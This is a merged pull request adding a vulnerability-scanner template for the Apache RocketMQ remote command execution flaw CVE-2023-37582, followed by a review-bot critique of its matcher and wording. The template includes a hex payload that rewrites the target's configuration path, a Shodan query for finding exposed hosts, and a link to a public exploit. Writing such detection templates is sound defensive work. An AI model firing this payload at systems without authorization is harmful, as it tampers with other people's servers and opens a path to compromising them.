Merged
50 changes: 50 additions & 0 deletions network/cves/2023/CVE-2023-37582.yaml
@@ -0,0 +1,50 @@
id: CVE-2023-37582

info:
name: Apache RocketMQ - Remote Command Execution
author: daffainfo
severity: critical
description: |
The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.
impact: |
Attackers can execute arbitrary commands on the system, potentially leading to full system compromise.
remediation: |
Upgrade RocketMQ to version 5.1.2 or above for 5.x series, or 4.9.7 or above for 4.x series.
reference:
- http://www.openwall.com/lists/oss-security/2023/07/12/1
- https://lists.apache.org/thread/m614czxtpvlztd7mfgcs2xcsg36rdbnc
- https://github.com/Malayke/CVE-2023-37582_EXPLOIT
- https://nvd.nist.gov/vuln/detail/CVE-2023-37582
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37582
cwe-id: CWE-94
epss-score: 0.87124
epss-percentile: 0.99392
cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: rocketmq
shodan-query: rocketmq port:"9876"
tags: cve,cve2023,apache,rocketmq,network,intrusive,vkev

tcp:
- inputs:
- data: 000000a4000000617b22636f6465223a3331382c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3430357d636f6e66696753746f7265506174683d2f746d702f70776e65640a70726f64756374456e764e616d653d746573742f706174685c6e746573745c6e74657374
type: hex

host:
- "{{Hostname}}"

port: 9876
read-size: 1024

matchers:
- type: dsl
dsl:
- "contains_all(raw, 'serializeTypeCurrentRPC', 'version')"
- "!contains_any(raw, 'Can not update config','FORBID ACCESS')"
condition: and
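Review bot: the verdict in this matcher rests almost entirely on the negative check. The positive clause `contains_all(raw, 'serializeTypeCurrentRPC', 'version')` is satisfied by any RocketMQ remoting response header, success or error, so a NameServer that rejects the request with a remark other than the two hard-coded strings ('Can not update config', 'FORBID ACCESS'), for example a differently worded error in another release, would be reported as vulnerable. If a vulnerable NameServer answers the update-config call with a success response, consider adding a positive condition on the response code in the header JSON alongside the existing two, so that the template fails closed on unexpected error replies rather than open. Two documentation points in the same hunk: the hex request body decodes to `configStorePath=/tmp/pwned`, so a successful probe changes where the target persists its NameServer configuration; the `intrusive` tag covers that, but the `description` or `impact` text should state the side effect so operators know what the template does to a live host. Also, in `description`, "When NameServer address are leaked" should read "When the NameServer address is leaked".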